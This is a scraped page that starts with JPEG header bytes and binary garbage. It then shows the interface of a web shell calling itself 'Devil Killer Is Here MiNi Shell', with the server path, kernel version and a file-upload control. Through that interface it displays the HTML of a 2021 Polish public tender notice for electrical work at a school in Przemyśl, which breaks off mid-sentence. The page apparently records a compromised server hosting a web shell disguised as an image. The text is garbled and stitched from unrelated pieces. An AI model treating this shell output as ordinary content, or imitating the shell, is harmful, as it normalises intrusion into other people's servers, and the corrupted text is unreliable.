JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210518/0005702102-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00057021 z dnia 2021-05-18</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRZEBUDOWA INSTALACJI ELEKTRYCZNEJ W SZKOLE PODSTAWOWEJ NR.14 PRZY UL.BORELOWSKIEGO 12 W PRZEMYŚLU – 1 ETAP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Przemyśl</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900341</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@um.przemysl.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przemysl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZEBUDOWA INSTALACJI ELEKTRYCZNEJ W SZKOLE PODSTAWOWEJ NR.14 PRZY UL.BORELOWSKIEGO 12 W PRZEMYŚLU – 1 ETAP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bdfc786f-b6fe-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00057021</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002188/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa instalacji elektrycznej w Szkole Podstawowej nr 14</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej, która dostępna jest pod adresem internetowym: https://platformazakupowa.pl/pn/przemysl.<br/>2. Zapytania, wnioski i inne informacje (z wyłączeniem oferty i dokumentów składanych wraz z nią) Wykonawcy przekazują za pośrednictwem funkcji „Wyślij wiadomość” dostępnej na stronie dedykowanej przedmiotowemu postępowaniu. <br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia z Biuletynu Zamówień Publicznych, pod którym zostało zamieszczone ogłoszenie o zamówieniu dotyczące niniejszego postępowania.- https://platformazakupowa.pl/pn/przemysl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu Platformy zakupowej opisane zostały w Regulaminie korzystania z Platformy (adres:<br/>https://platformazakupowa.pl/strona/1-regulamin). Składając ofertę Wykonawca akceptuje Regulamin.<br/>2. Jeśli Wykonawca będzie chciał założyć konto Użytkownika na Platformie wówczas konieczne jest posiadanie przez Użytkownika aktywnego konta poczty elektronicznej (e-mail). Adres email wskazany w Formularzu Oferty powinien być tożsamy z adresem używanym przez Wykonawcę/Użytkownika do obsługi jego konta na Platformie. Po zarejestrowaniu się na Platformie Wykonawca będzie miał dostęp do Instrukcji dla Wykonawców również pod adresem<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy to 150 MB, dopuszczalna ilość plików to 10.<br/>4. Korzystanie z Platformy odbywać się może wyłącznie na zasadach i w zakresie wskazanym w Regulaminie. Minimalne wymagania techniczne umożliwiające korzystanie ze strony www.platformazakupowa.pl to:<br/>przeglądarka internetowa Internet Explorer, Chrome i FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości co najmniej 256 kbit/s. platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli. <br/>5. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków<br/>dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę zakupową.<br/>6. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z<br/>wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).<br/>7. Składanie ofert przez www.platformazakupowa.pl jest dla Wykonawców całkowicie bezpłatne.<br/>8. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w formacie danych: .pdf, .doc, .docx, .rtf, .xps, .odt i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym.<br/>9. Zamawiający jednocześnie informuje, że posiadanie konta na Platformie jest dobrowolne, a złożenie oferty w przetargu jest możliwe bez posiadania konta.<br/>10. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>11. Zamawiający jednocześnie informuje, że posiadanie konta na Platformie jest dobrowolne, a złożenie oferty w przetargu jest możliwe bez posiadania konta.<br/>12. Każdy załączany plik zawierający dokumenty, oświadczenia lub<br/>pełnomocnictwa musi być uprzednio podpisany podpisami kwalifikowanymi, podpisami osobistymi lub podpisami zaufanymi przez upoważnione osoby reprezentujące odpowiednio wykonawcę, podmioty wspólnie ubiegające się o udzielenie zamówienia, podmiot trzeci, na którego zasoby Wykonawca się<br/>powołuje lub podwykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), informuję, że:<br/>1)administratorem danych osobowych Wykonawcy oraz osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio Wykonawca pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu, jest Prezydent Miasta Przemyśla, Rynek 1, 37 700 Przemyśl<br/>2)Inspektorem Ochrony Danych w Gminie Miejskiej Przemyśl jest Pan Przemysław Popiel, kontakt: Urząd Miejski w Przemyślu, Rynek 1, 37 – 700 Przemyśl, bbi@um.przemysl.pl, tel. +48 16 675 21 14<br/>3)Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na<br/>Zamawiającym <br/>4)odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp<br/>5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 5lat liczone od pierwszego dnia roku następnego po roku, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5lat, okres przechowywania obejmuje cały czas trwania umowy<br/>6)obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w po-stępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp<br/>7)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany stosowanie do art. 22 RODO<br/>8)posiada Pan/Pani:<br/>a)na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących <br/>b)na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie nie-zgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników<br/>c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dot. narusza przepisy RODO<br/>9)nie przysługuje Pani/Panu:<br/>a)w związku z art. 17 ust.3 lit. b,d lub e RODO prawo do usunięcia danych osobowych<br/>b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO<br/>c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż pod-stawą prawną przetwarzania Pani/Pana danych osobowych jest art.6 ust.1 lit.c RODO<br/>2.Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu z wył art.14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa instalacji elektrycznej w Szkole Podstawowej Nr 14 w Przemyślu na terenie działki nr 2428 obręb 202 – I etap.<br/>2.	Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) został przedstawiony w nw. dokumentach stanowiących Załącznik Nr 5 do SWZ:<br/>1)	Projekt Wykonawczy – etap I;<br/>2)	Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót;<br/>a)	zakres robót dotyczy wykonania instalacji w pomieszczeniach objętych zakresem robót 1 etapu na parterze, pomieszczenia nr 1/22, 1/23, 1/24, 1/25, 1/26, 1/27, 1/10b, 1/29, 1/30, 1/31,<br/>b)	demontaż instalacji elektrycznych,<br/>c)	montaż instalacji:<br/> - siły,<br/> - oświetlenia ogólnego i gniazd wtykowych ogólnych,<br/> - instalacje gniazd data,<br/> - oświetlenia awaryjnego i ewakuacyjnego.<br/>d)	połączenia wyrównawcze,<br/>e)	dodatkowa ochrona od porażeń,<br/>f)	montaż rozdzielni R-00 piwnice,<br/>g)	montaż rozdzielni R-13 parter,<br/>h)	przebudowa tablicy TZGA parter,<br/>i)	WLZ relacji TZGA – R00,<br/>j)	WLZ relacji R00 – R13 Korytka kablowe na poziomie piwnic,<br/>k)	główne połączenia wyrównawcze;<br/>3)	Przedmiar robót; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45311200-2 - Roboty w zakresie instalacji elektrycznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-06-22 do 2021-08-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował kryterium najniższej ceny.2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.3. Za najkorzystniejszą zostanie uznana oferta z najniższą ceną brutto.4. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.5. W toku badania i oceny ofert Zamawiający będzie mógł żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.6. Zamawiający wybierze najkorzystniejszą ofertę w terminie związania ofertą<br/>określonym w SWZ.7. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty,<br/>Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w<br/>wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.8. W przypadku<br/>braku zgody, o której mowa w ust. 7, oferta będzie podlegała odrzuceniu, a Zamawiający zwróci się o<br/>wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że<br/>zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji zapewniającej należyte wykonanie zamówienia, jeżeli wykaże, że podczas realizacji przedmiotu zamówienia będzie dysponował minimum 1 osobą posiadającą uprawnienia, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz.U. z 2020r. poz. 1333 z późn. zm.) do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do pełnienia funkcji kierownika robót elektrycznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga składania podmiotowych środków dowodowych na potwierdzenie niepodleganiu wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający, przed udzieleniem zamówienia, na podst. art. 274 ust. 1 ustawy Pzp, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnego na dzień złożenia wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia uwzględniającego minimum 1 osobę posiadającą uprawnienia, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity: Dz.U. z 2020r. poz. 1333 z późn. zm.) do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych do pełnienia funkcji kierownika robót elektrycznych;<br/>2.	Z treści dokumentów i oświadczeń musi wynikać jednoznacznie, iż postawione przez Zamawiającego warunki i wymagania zostały spełnione.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. W niniejszym postępowaniu zamawiający wymaga wniesienia wadium w wysokości 2.000,00<br/>zł.2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 ustawy Pzp.3. Przedłużenie terminu związania ofertą będzie dopuszczalne<br/>tylko z jednoczesnym przedłużeniem okresu ważności wadium albo jeżeli nie będzie to możliwe,<br/>z wniesieniem nowego wadium na przedłużony okres związania ofertą.4. Wadium może być<br/>wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:1) pieniądzu;2)<br/>gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez<br/>podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz.U. z 2020 r. poz. 299).5.<br/>Wadium wniesione w formach, o których mowa w ust. 4 pkt 2-4 niniejszego Rozdziału musi<br/>nieodwołalnie i bezwarunkowo zobowiązywać poręczyciela lub gwaranta do zapłaty kwoty<br/>pieniężnej na pierwsze wezwanie Zamawiającego, w wysokości odpowiadającej kwocie<br/>wadium.6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek<br/>bankowy, którego posiadaczem jest Zamawiający:Getin Noble Bank - Nr rachunku: 86 1560 0013 2787 7120 6000 0154z dopiskiem w tytule płatności“Wadium w postępowaniu o<br/>sygnaturze: ZP.271.4.2021”a dowód wniesienia wadium należy dołączyć do oferty. Za<br/>skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w wyznaczonym<br/>terminie znajdzie się na rachunku bankowym Zamawiającego.7. Jeżeli wadium jest wnoszone w<br/>formie gwarancji lub poręczenia, o których mowa w ust. 4 pkt 2-4 niniejszego Rozdziału,<br/>Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej.8. Gwarancja lub poręczenie musi zabezpieczać 